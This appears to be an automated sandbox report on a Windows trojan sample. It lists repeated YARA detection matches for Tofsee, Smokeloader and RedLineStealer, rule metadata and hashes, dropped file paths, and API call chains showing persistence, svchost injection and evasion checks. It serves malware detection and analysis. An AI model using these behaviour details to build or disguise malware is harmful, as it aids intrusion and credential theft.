Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000011.00000002.310684388.00000000005B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0040C913
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe; Code function: 17_2_0040C913
        Source: C:\Windows\SysWOW64\svchost.exe; Code function: 23_2_0012C913
        Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError
        Source: C:\Windows\System32\svchost.exe; Section loaded: xboxlivetitleid.dll
        Source: C:\Windows\System32\svchost.exe; Section loaded: cdpsgshims.dll
        Source: C:\Windows\System32\svchost.exe; Section loaded: windowscoredeviceinfo.dll
        Source: C:\Windows\System32\svchost.exe; Section loaded: windowscoredeviceinfo.dll
        Source: C:\Windows\System32\svchost.exe; Section loaded: windowscoredeviceinfo.dll
        Source: C:\Windows\System32\svchost.exe; Section loaded: windowscoredeviceinfo.dll
        Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.3.file.exe.21c0000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.2080e67.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000011.00000002.310684388.00000000005B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: C:\Windows\SysWOW64\cmd.exe; File created: C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Users\user\Desktop\file.exe; Code function: String function: 0040EE2A appears 40 times
        Source: C:\Users\user\Desktop\file.exe; Code function: String function: 00402544 appears 53 times
        Source: C:\Users\user\Desktop\file.exe; Code function: String function: 020827AB appears 35 times
        Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle
        Source: file.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe; Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
        Source: C:\Windows\System32\svchost.exe; File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
        Source: classification engine; Classification label: mal100.troj.evad.winEXE@34/16@5/2
        Source: C:\Users\user\Desktop\file.exe; File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe; Code function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep
        Source: C:\Windows\SysWOW64\svchost.exe; Code function: 23_2_00129A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep
        Source: file.exeReversingLabs: Detection: 43%
        Source: file.exeVirustotal: Detection: 34%
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
